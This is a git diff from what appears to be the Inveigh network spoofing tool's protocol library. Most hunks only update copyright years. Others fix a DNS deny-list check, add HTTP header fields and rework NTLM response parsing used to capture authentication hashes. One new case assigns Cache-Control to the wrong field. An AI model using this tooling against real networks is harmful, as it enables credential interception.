+ * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option8.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option8.cs index b6d522c..05929d9 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option8.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option8.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSChecker.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSChecker.cs index c8da935..c70bd7d 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSChecker.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSChecker.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -103,7 +103,7 @@ namespace Quiddity.DNS this.OutputMessage = this.OutputServiceDenied; return false; } - else if (HostIsDenied(name) && FQDNIsDenied(name)) + else if (HostIsDenied(name) || FQDNIsDenied(name)) { this.OutputMessage = this.OutputHostDenied; return false; diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSHeader.cs index d456b26..bd68c81 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSHeader.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSHeader.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSPacket.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSPacket.cs index b18b50b..74238d9 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSPacket.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSPacket.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSQuestion.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSQuestion.cs index 34e2fcb..aa91f4a 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSQuestion.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSQuestion.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSResource.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSResource.cs index 258a08c..f6ad4f6 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSResource.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSResource.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/GSSAPI/GSSAPIInitSecContext.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/GSSAPI/GSSAPIInitSecContext.cs index 34c70cb..82b443e 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/GSSAPI/GSSAPIInitSecContext.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/GSSAPI/GSSAPIInitSecContext.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPRequest.cs index 7423081..70fac9e 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPRequest.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPRequest.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -49,6 +49,8 @@ namespace Quiddity.HTTP public string Accept { get; set; } public string AcceptEncoding { get; set; } public string AcceptLanguage { get; set; } + public string CacheControl { get; set; } + public string ProxyConnection{ get; set; } public string Authorization { get; set; } public string ProxyAuthorization { get; set; } @@ -142,6 +144,10 @@ namespace Quiddity.HTTP this.AcceptLanguage = value; break; + case "CACHE-CONTROL:": + this.ProxyConnection = value; + break; + case "AUTHORIZATION:": this.Authorization = value; break; @@ -150,6 +156,10 @@ namespace Quiddity.HTTP this.ProxyAuthorization = value; break; + case "PROXY-CONNECTION:": + this.ProxyConnection = value; + break; + } } diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPResponse.cs index 4ac632d..b5d2898 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPResponse.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPResponse.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/ICMPv6RouterAdvertisement.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/ICMPv6RouterAdvertisement.cs index fec13c4..c0129bf 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/ICMPv6RouterAdvertisement.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/ICMPv6RouterAdvertisement.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/Options/ICMPv6RecursiveDNS.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/Options/ICMPv6RecursiveDNS.cs index 2fa9f31..42f3431 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/Options/ICMPv6RecursiveDNS.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/Options/ICMPv6RecursiveDNS.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/IP/IPHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/IP/IPHeader.cs index 80194ab..9167c5f 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/IP/IPHeader.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/IP/IPHeader.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/LDAPMessage.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/LDAPMessage.cs index 18445ba..5fe7613 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/LDAPMessage.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/LDAPMessage.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPResult.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPResult.cs index 5d53155..7f53dc2 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPResult.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPResult.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSaslCredentials.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSaslCredentials.cs index a9f9670..d6d11a7 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSaslCredentials.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSaslCredentials.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedCapabilities.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedCapabilities.cs index 087889b..dd172c6 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedCapabilities.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedCapabilities.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedSASLMechanisms.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedSASLMechanisms.cs index 3db038e..d0ef4b8 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedSASLMechanisms.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedSASLMechanisms.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRChecker.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRChecker.cs index c1ca969..ec071be 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRChecker.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRChecker.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRHeader.cs index 8df7faa..a64bb05 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRHeader.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRHeader.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRPacket.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRPacket.cs index c424a82..c103c21 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRPacket.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRPacket.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRQuestion.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRQuestion.cs index 7c8fd9e..b919cd5 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRQuestion.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRQuestion.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRResource.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRResource.cs index e4f090e..be4f768 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRResource.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRResource.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSChecker.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSChecker.cs index 729adca..14f24da 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSChecker.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSChecker.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -71,7 +71,7 @@ namespace Quiddity.MDNS public bool QuestionIsAllowed(string question) { - + if (!Utilities.ArrayIsNullOrEmpty(this.Questions) && !Array.Exists(this.Questions, element => element == question.ToUpper())) { return false; diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSHeader.cs index 2647e59..3d86d5a 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSHeader.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSHeader.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSPacket.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSPacket.cs index 003a629..a7a8543 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSPacket.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSPacket.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSQuestion.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSQuestion.cs index e3b224a..34bee2b 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSQuestion.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSQuestion.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSResource.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSResource.cs index c24079a..c95d013 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSResource.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSResource.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMChallenge.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMChallenge.cs index d0ec6f9..4f91c24 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMChallenge.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMChallenge.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMHelper.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMHelper.cs index 7f36060..463eca5 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMHelper.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMHelper.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMNegotiate.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMNegotiate.cs index f5a9353..df315d9 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMNegotiate.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMNegotiate.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMResponse.cs index 0790917..a511ea1 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMResponse.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMResponse.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -163,9 +163,22 @@ namespace Quiddity.NTLM this.EncryptedRandomSessionKeyMaxLen = packetReader.ReadUInt16(); this.EncryptedRandomSessionKeyBufferOffset = packetReader.ReadUInt32(); this.NegotiateFlags = packetReader.ReadBytes(4); - this.Version = packetReader.ReadBytes(8); - this.MIC = packetReader.ReadBytes(16); - this.Payload = packetReader.ReadBytes(data.Length - 88); + + + string flags = Convert.ToString(BitConverter.ToUInt32(this.NegotiateFlags, 0), 2).PadLeft(this.NegotiateFlags.Length * 8, '0'); + + if (String.Equals(flags.Substring(6, 1), "1")) + { + this.Version = packetReader.ReadBytes(8); + } + + if (String.Equals(flags.Substring(16, 1), "1")) + { + this.MIC = packetReader.ReadBytes(16); + } + + this.Payload = packetReader.ReadBytes(data.Length - (int)this.DomainNameBufferOffset); + } } @@ -203,17 +216,17 @@ namespace Quiddity.NTLM private void ParseValues() { this.DomainName = new byte[this.DomainNameLen]; - Buffer.BlockCopy(this.Payload, (int)(this.DomainNameBufferOffset - 88), this.DomainName, 0, this.DomainNameLen); + Buffer.BlockCopy(this.Payload, 0, this.DomainName, 0, this.DomainNameLen); this.UserName = new byte[this.UserNameLen]; - Buffer.BlockCopy(this.Payload, (int)(this.UserNameBufferOffset - 88), this.UserName, 0, this.UserNameLen); + Buffer.BlockCopy(this.Payload, (int)(this.UserNameBufferOffset - this.DomainNameBufferOffset), this.UserName, 0, this.UserNameLen); this.Workstation = new byte[this.WorkstationLen]; - Buffer.BlockCopy(this.Payload, (int)(this.WorkstationBufferOffset - 88), this.Workstation, 0, this.WorkstationLen); + Buffer.BlockCopy(this.Payload, (int)(this.WorkstationBufferOffset - this.DomainNameBufferOffset), this.Workstation, 0, this.WorkstationLen); this.EncryptedRandomSessionKey = new byte[this.EncryptedRandomSessionKeyLen]; - Buffer.BlockCopy(this.Payload, (int)(this.EncryptedRandomSessionKeyBufferOffset - 88), this.EncryptedRandomSessionKey, 0, this.EncryptedRandomSessionKeyLen); + Buffer.BlockCopy(this.Payload, (int)(this.EncryptedRandomSessionKeyBufferOffset - this.DomainNameBufferOffset), this.EncryptedRandomSessionKey, 0, this.EncryptedRandomSessionKeyLen); this.LmChallengeResponse = new byte[this.LmChallengeResponseLen]; - Buffer.BlockCopy(this.Payload, (int)(this.LmChallengeResponseBufferOffset - 88), this.LmChallengeResponse, 0, this.LmChallengeResponseLen); + Buffer.BlockCopy(this.Payload, (int)(this.LmChallengeResponseBufferOffset - this.DomainNameBufferOffset), this.LmChallengeResponse, 0, this.LmChallengeResponseLen); this.NtChallengeResponse = new byte[this.NtChallengeResponseLen]; - Buffer.BlockCopy(this.Payload, (int)(this.NtChallengeResponseBufferOffset - 88), this.NtChallengeResponse, 0, this.NtChallengeResponseLen); + Buffer.BlockCopy(this.Payload, (int)(this.NtChallengeResponseBufferOffset - this.DomainNameBufferOffset), this.NtChallengeResponse, 0, this.NtChallengeResponseLen); } } diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMAVPair.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMAVPair.cs index 2e9c678..fc25d20 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMAVPair.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMAVPair.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv1Response.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv1Response.cs index 36eba9a..64f2890 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv1Response.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv1Response.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2ClientChallenge.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2ClientChallenge.cs index cbda85b..e2781bc 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2ClientChallenge.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2ClientChallenge.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2Response.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2Response.cs index 0c26bff..3ff7439 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2Response.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/Structures/NTLMv2Response.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSChecker.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSChecker.cs index cbb9d2e..03de96d 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSChecker.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSChecker.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSHeader.cs index 88255a3..d0ae62d 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSHeader.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSHeader.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSPacket.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSPacket.cs index 84fd653..cc4af89 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSPacket.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSPacket.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSQuestion.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSQuestion.cs index 9840b14..546cf01 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSQuestion.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSQuestion.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSResource.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSResource.cs index 89d136a..0a1aeed 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSResource.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSNSResource.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSSessionService.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSSessionService.cs index 70e8dbe..5cc61ac 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSSessionService.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NetBIOS/NetBIOSSessionService.cs @@ 